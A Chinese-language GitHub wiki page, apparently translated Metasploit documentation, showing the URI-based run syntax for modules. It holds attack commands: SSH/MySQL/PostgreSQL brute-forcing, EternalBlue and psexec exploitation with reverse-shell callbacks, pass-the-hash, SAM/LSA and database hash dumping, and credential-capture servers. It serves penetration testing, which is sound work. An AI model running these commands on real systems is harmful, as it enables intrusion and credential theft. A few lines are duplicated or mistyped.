forked from rapid7/metasploit-framework
-
Notifications
You must be signed in to change notification settings - Fork 3
Metasploit 的使用
L edited this page Mar 16, 2022
·
4 revisions
根据你的技能水平 - 如果你没有 Metasploit 的使用经验, 以下资源可能是一个更好的起点:
- https://tryhackme.com/room/rpmetasploit
- http://www.offensive-security.com/metasploit-unleashed/Main_Page
- https://metasploit.help.rapid7.com/docs/
- https://www.kali.org/docs/tools/starting-metasploit-framework-in-kali/
- https://github.com/rapid7/metasploitable3
Metasploit 的常见用法, 加载模块和设置多个选项:
use exploit/linux/postgres/postgres_payload
set username administrator
set password pass
set rhost 192.168.123.6
set rport 5432
set database postgres
set lhost 192.168.123.1
set lport 5000
run
你还可以指定多个以空格分隔的 RHOSTS 或使用 CIDR 子网掩码:
set rhosts 127.0.0.1 127.0.0.2
set rhosts 127.0.0.1/24
本文档描述了在命令中设置多个选项的现代方法. 命令历史不仅可以更轻松地在 Metasploit 的控制台中使用 CTRL+R 进行反向搜索, 而且还可以轻松地在渗透测试者之间共享备忘单.
Metasploit 现在支持使用 URI 字符串作为 run 命令的参数来一次指定 RHOST 值和选项值:
use exploit/linux/postgres/postgres_payload
run postgres://administrator:[email protected] lhost=192.168.123.1 lport=5000
当前支持以下协议, 并在下面更详细地描述:
- cidr - 可与其他协议结合指定地址子网掩码长度
- file - 从文件中加载一系列由换行符分隔的 RHOST 值. 文件中还可以包含 URI 字符串
- http
- https
- mysql
- postgres
- smb
- ssh
无论协议如何, 要保留空格, 请使用引号括起来:
use auxiliary/admin/postgres/postgres_sql
run 'postgres://user:this is my [email protected]/database_name' sql='select version()'
在某些情况下, 在密码中转义引号可能太麻烦. 在这种情况下, 仍然可以手动设置密码选项并使用未指定密码的 URI 参数, 模块将优雅地回退到使用手动设置的密码:
set password !@£$%^&*()"'
run smb://[email protected]
你还可以指定多个 RHOST 参数, 并提供额外的内置选项:
use scanner/smb/smb_enumshares
run smb://test:[email protected] smb://user:[email protected] smb://test:[email protected] verbose=true
Auxiliary 模块:
use auxiliary/scanner/http/title
run http://example.com https://example.com https://foo.example.com/bar
指定凭据和 Payload 参数:
use exploit/unix/http/cacti_filter_sqli_rce
run http://admin:[email protected]/cacti/ lhost=tun0 lport=4444
run 'http://admin:pass with [email protected]/cacti/' lhost=tun0 lport=4444
指定端口:
run http://192.168.123.6:9001
你可以使用 HttpTrace 选项将所有 HTTP 请求和响应打印到 Metasploit 控制台, 并启用详细日志记录:
use auxiliary/scanner/http/title
run http://example.com HttpTrace=true verbose=true
通过代理发送 HTTP 请求, 比如 BurpSuite 代理:
use auxiliary/scanner/http/title
run http://example.com HttpTrace=true verbose=true proxies=HTTP:127.0.0.1:8080
如果模块没有 username/password 选项, 例如登录 Web 应用程序的管理门户等, 则通过 HTTP URI 提供的凭据将为 HTTP 基本访问身份验证 则会设置 HttpUsername/HttpPassword 选项.
例如, 以下模块中, 将会设置 username/password 选项, 而不会设置 HttpUsername/HttpPassword 选项:
use exploit/unix/http/cacti_filter_sqli_rce
Module options (exploit/unix/http/cacti_filter_sqli_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
... Omitted ...
* PASSWORD admin no Password to login with
TARGETURI /cacti/ yes The URI of Cacti
* USERNAME user yes User to login with
... Omitted ...
msf > check http://admin:[email protected]/cacti/
USERNAME 和 PASSWORD 会设置为 'admin' 和 'user'
For the following module, as there are no USERNAME/PASSWORD options, the HttpUsername/HttpPassword options will be chosen instead for HTTP Basic access Authentication purposes
对于以下模块, 由于没有 USERNAME/PASSWORD 选项, 将选择 HttpUsername/HttpPassword 选项来代替 HTTP 基本访问身份验证 目的
use exploit/multi/http/tomcat_mgr_deploy
run http://admin:[email protected]:8888 HttpTrace=true verbose=true lhost=192.168.123.1
注意 HttpUsername/HttpPassword 参数可能不在 options 中, 但可在高级模块选项中找到:
use auxiliary/scanner/http/title
advanced
Module advanced options (auxiliary/scanner/http/title):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
* HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
* HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accept
ed: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 no The User-Agent header to use for all requests
)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
枚举 SMB 版本:
use auxiliary/scanner/smb/smb_version
run smb://10.10.10.161
枚举 SMB 共享:
use auxiliary/scanner/smb/smb_enumshares
run smb://10.10.10.161
runEnumerate smb://user:[email protected]
run 'smb://domain;user with spaces:[email protected]' SMB::AlwaysEncrypt=false SMB::ProtocolVersion=1
枚举 SMB 共享并递归显示共享的文件:
use auxiliary/scanner/smb/smb_enumshares
run 'smb://user:pass with a [email protected]' showfiles=true spidershares=true
枚举用户:
use auxiliary/scanner/smb/smb_enumusers
run smb://user:[email protected]
在 SMB 共享中枚举 gpp 文件:
use auxiliary/scanner/smb/smb_enum_gpp
run smb://192.168.123.13/share_name verbose=true store=true
run smb://user:[email protected]/share_name verbose=true store=true
创建一个在返回 NT_STATUS_LOGON_FAILURE 之前接受凭据的模拟 SMB 服务器. 然后供后续破解这些哈希:
use auxiliary/server/capture/smb
run
检查可利用性:
use auxiliary/scanner/smb/smb_ms17_010
check 10.10.10.23
check 10.10.10.0/24
check smb://user:[email protected]/
check smb://domain;user:[email protected]/
check cidr:/24:smb://user:[email protected] threads=32
截至 2021 年, Metasploit 支持单个漏洞利用模块, 该模块能够针对 Windows 7、Windows 8.1、Windows 2012 R2 和 Windows 10, Metasploit 总结截至 2021 年, Metasploit 支持单个漏洞利用模块, 该模块能够针对 Windows 7、Windows 8.1、Windows 2012 R2 和 Windows 10, Metasploit 总结中的完整详细信息:
use exploit/windows/smb/ms17_010_eternalblue
run 10.10.10.23 lhost=192.168.123.1
run 10.10.10.0/24 lhost=192.168.123.1 lport=5000
run smb://user:[email protected]/ lhost=192.168.123.1
run smb://domain;user:[email protected]/ lhost=192.168.123.1
使用账号凭据对远程主机运行 psexec:
use exploit/windows/smb/psexec
run smb://user:[email protected] lhost=192.168.123.1 lport=5000
通过 NTLM 哈希, 运行 pexec:
use exploit/windows/smb/psexec
run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected] lhost=10.10.14.13 lport=5000
导出 SAM hash 和 LSA hash:
use auxiliary/gather/windows_secrets_dump
run smb://user:[email protected]
通过 NTLM 导出 secrets:
use auxiliary/gather/windows_secrets_dump
run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected]
下载文件:
use auxiliary/admin/smb/download_file
run smb://a:[email protected]/my_share/helloworld.txt
上传文件:
use auxiliary/admin/smb/upload_file
echo "my file" > local_file.txt
run smb://a:[email protected]/my_share/remote_file.txt lpath=./local_file.txt
获取 SSH 版本:
use auxiliary/scanner/ssh/ssh_version
run ssh://127.0.0.1
通过已知用户名和密码字典爆破账号:
use scanner/ssh/ssh_login
run ssh://[email protected] threads=50 pass_file=./rockyou.txt
爆破账号凭证:
use scanner/ssh/ssh_login
run ssh://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt
CIDR 范围内进行爆破:
use scanner/ssh/ssh_login
run cidr:/24:ssh://user:[email protected] threads=50
run cidr:/24:ssh://[email protected] threads=50 pass_file=./rockyou.txt
如果你有 SSH 账号, 可通过 ssh_login 模块创建 Metasploit session:
use scanner/ssh/ssh_login
run ssh://user:[email protected]
在网段中检测 SSH 账号重用的主机:
use scanner/ssh/ssh_login
run cidr:/24:ssh://user:[email protected] threads=50
指定 SSH 非默认的端口:
use scanner/ssh/ssh_login
run ssh://user:[email protected]:2222
像 Meterpreter 一样, 可以 通过 Metasploit SSH 会话进行端口转发:
route add 172.18.103.0/24 ssh_session_id
添加路由指向最近打开的 Meterpreter 会话:
route add 172.18.103.0/24 -1
例如, 在运行 MySQL 目标时:
docker run -it --rm -e MYSQL_ROOT_PASSWORD=' a b c p4$$w0rd' -p 3306:3306 mariadb:latest
枚举版本:
use auxiliary/scanner/mysql/mysql_version
run mysql://127.0.0.1
如果你有 MySQL 的账号凭证:
use auxiliary/scanner/mysql/mysql_login
run 'mysql://root: a b c [email protected]'
在网段中测试 MySQL 账号凭证重用:
use auxiliary/scanner/mysql/mysql_login
run cidr:/24:mysql://user:[email protected] threads=50
指定非默认的端口:
use auxiliary/scanner/mysql/mysql_login
run mysql://user:[email protected]:2222
已知用户名, 利用密码字典进行爆破:
use auxiliary/scanner/mysql/mysql_login
run mysql://[email protected] threads=50 pass_file=./rockyou.txt
爆破账号凭证:
use auxiliary/scanner/mysql/mysql_login
run mysql://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt
在网段中进行爆破
use auxiliary/scanner/mysql/mysql_login
run cidr:/24:mysql://user:[email protected] threads=50
run cidr:/24:mysql://[email protected] threads=50 pass_file=./rockyou.txt
导出用户名和 hash:
use auxiliary/scanner/mysql/mysql_hashdump
run 'mysql://root: a b c [email protected]'
列出非默认表信息:
use auxiliary/scanner/mysql/mysql_schemadump
run 'mysql://root: a b c [email protected]'
执行 SQL:
use admin/mysql/mysql_sql
run 'mysql://root: a b c [email protected]' sql='select version()'
例如, 在运行 PostgreSQL 目标时:
docker run --rm -p 5432:5432 -e POSTGRES_PASSWORD=password postgres:13.1-alpine
获取版本:
use auxiliary/scanner/postgres/postgres_version
run postgres://192.168.123.13
run postgres://postgres:[email protected]
如果你有 PostgreSQL 凭据来验证:
use auxiliary/scanner/postgres/postgres_login
run 'postgres://root: a b c [email protected]'
在网段中重用 PostgreSQL 凭证:
use auxiliary/scanner/postgres/postgres_login
run cidr:/24:myspostgresl://user:[email protected] threads=50
指定非默认的端口:
use auxiliary/scanner/postgres/postgres_login
run postgres://user:[email protected]:2222
已知账号使用密码字典爆破:
use auxiliary/scanner/postgres/postgres_login
run postgres://[email protected] threads=50 pass_file=./rockyou.txt
爆破凭证:
use auxiliary/scanner/postgres/postgres_login
run postgres://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt
在网段中验证凭证账号:
use auxiliary/scanner/postgres/postgres_login
run cidr:/24:postgres://user:[email protected] threads=50
run cidr:/24:postgres://[email protected] threads=50 pass_file=./rockyou.txt
捕获记录 PostgreSQL:
use auxiliary/server/capture/postgresql
run
如果客户端连接到上面创建的服务器:
psql postgres://postgres:mysecretpassword@localhost:5432
Metasploit 就会输出登录的凭证信息:
msf6 auxiliary(server/capture/postgresql) >
[*] Started service listener on 0.0.0.0:5432
[*] Server started.
[+] PostgreSQL LOGIN 127.0.0.1:60406 postgres / mysecretpassword / postgres
导出用户名和 hash:
use auxiliary/scanner/postgres/postgres_hashdump
run postgres://postgres:[email protected]
run postgres://postgres:[email protected]/database_name
导出表结构:
use auxiliary/scanner/postgres/postgres_schemadump
run postgres://postgres:[email protected]
run postgres://postgres:[email protected] ignored_databases=template1,template0,postgres
use auxiliary/admin/postgres/postgres_sql
run 'postgres://user:this is my [email protected]/database_name' sql='select version()'
use exploit/linux/postgres/postgres_payload
run postgres://postgres:[email protected] lhost=192.168.123.1 lport=5000 payload=linux/x64/meterpreter/reverse_tcp target='Linux\ x86_64'
指定 session 升级到 Meterpreter:
sessions -u 3
To upgrade the most recently opened session to Meterpreter using the sessions command:
使用 session 命令将最近打开的会话升级到 Meterpreter:
sessions -u -1
也可以通过 shell_to_meterpreter 模块手动升级:
use multi/manage/shell_to_meterpreter
run session=-1
run session=-1 win_transfer=POWERSHELL
run session=-1 win_transfer=VBS
post 模块可指定 session 进行利用:
use post/windows/gather/credentials/gpp
run session=-1